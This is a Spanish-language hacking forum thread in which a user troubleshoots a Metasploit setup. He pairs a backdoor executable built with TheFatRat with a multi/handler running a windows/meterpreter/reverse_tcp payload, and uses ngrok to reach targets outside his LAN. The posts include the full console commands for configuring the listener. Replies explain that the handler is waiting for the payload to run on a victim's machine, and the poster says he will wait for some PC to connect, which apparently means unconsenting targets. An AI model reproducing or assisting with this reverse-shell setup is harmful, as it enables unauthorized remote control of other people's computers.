Underc0de

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: Tharx_ en Enero 15, 2018, 12:31:58 AM

Título: [DUDA]MetaSploit - Conectividad LAN y Fuera LAN
Publicado por: Tharx_ en Enero 15, 2018, 12:31:58 AM
Tengo una pregunta: ¿por qué será que los dispositivos claramente que le corren el windows no se conectan a mi dispositivo? Cuando veo un tutorial en pdf a ellos le aparecen los dispositivos que se quieren conectar a su notebook o como sea, pero a mi no me sale. Aqui dejo el codigo que me sale, aun usando TheFatRat que creo el backdoor ejecutable y cuando termino todo me voy a usar el metasploit y no me sale nada, yo he abierto los puertos y utlizo ngrok para darle un ataque fuera de LAN pero me da un error no se si ando viendo tutoriales y libros de versiones anteriores y eso afecte en algo ¿que me recomiendan?

root@kali (https://underc0de.org/foro/index.php?action=profile;u=42200):~/Escritorio/TheFatRat/output# cd
root@kali (https://underc0de.org/foro/index.php?action=profile;u=42200):~# msfconsole
                                                 
     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


       =[ metasploit v4.16.15-dev                         ]
+ -- --=[ 1699 exploits - 968 auxiliary - 299 post        ]
+ -- --=[ 503 payloads - 40 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use multi/handler
msf exploit(handler) > use payload windows/meterpreter/reverse_tcp
[-] Failed to load module: payload
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > sset lhost 192.168.1.103
[-] Unknown command: sset.
msf exploit(handler) > set lhost 192.168.1.103
lhost => 192.168.1.103
msf exploit(handler) > set lport 8080
lport => 8080
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.103    yes       The listen address
   LPORT     8080             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit
Título: Re:[DUDA]MetaSploit - Conectividad LAN y Fuera LAN
Publicado por: ronluas en Enero 15, 2018, 12:57:22 AM
Probaste si te sale el mismo error en LAN?
Título: Re:[DUDA]MetaSploit - Conectividad LAN y Fuera LAN
Publicado por: Tharx_ en Enero 15, 2018, 02:41:14 AM
Con ese mismo script no, lo intentaré y daré los resultados.
Título: Re:[DUDA]MetaSploit - Conectividad LAN y Fuera LAN
Publicado por: Rad1us en Enero 15, 2018, 05:04:22 AM
Hola @RaineIU.
Según lo que pones has puesto a la escucha el handler esperando que le llegue alguna conexión.

Exploit running as background job 0.
Started reverse TCP handler on 192.168.1.103:8080

No te da ningún error, tan solo te informa de que la operación se esta llevando a cabo en segundo plano.

Solo queda que en maquina se ejecute el payload ya que no estas usando ningún exploit para su ejecución.

Por cierto siempre he escuchado que es mejor usar "run" en vez de "exploit", no tengo ,muy claro por que pero en sus orígenes era así
msf exploit(handler) > exploit
msf exploit(handler) > run

Un saludo.
Título: Re:[DUDA]MetaSploit - Conectividad LAN y Fuera LAN
Publicado por: Tharx_ en Enero 15, 2018, 10:52:27 AM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Hola @RaineIU.
Según lo que pones has puesto a la escucha el handler esperando que le llegue alguna conexión.

Exploit running as background job 0.
Started reverse TCP handler on 192.168.1.103:8080

No te da ningún error, tan solo te informa de que la operación se esta llevando a cabo en segundo plano.

Solo queda que en maquina se ejecute el payload ya que no estas usando ningún exploit para su ejecución.

Por cierto siempre he escuchado que es mejor usar "run" en vez de "exploit", no tengo ,muy claro por que pero en sus orígenes era así
msf exploit(handler) > exploit
msf exploit(handler) > run

Un saludo.

Gracias Amigo, me quedó entendido. Usaré run a ver como me va, mientras tendré que esperar que el MetaSploit lance que algún pc se conectó a mi pc :C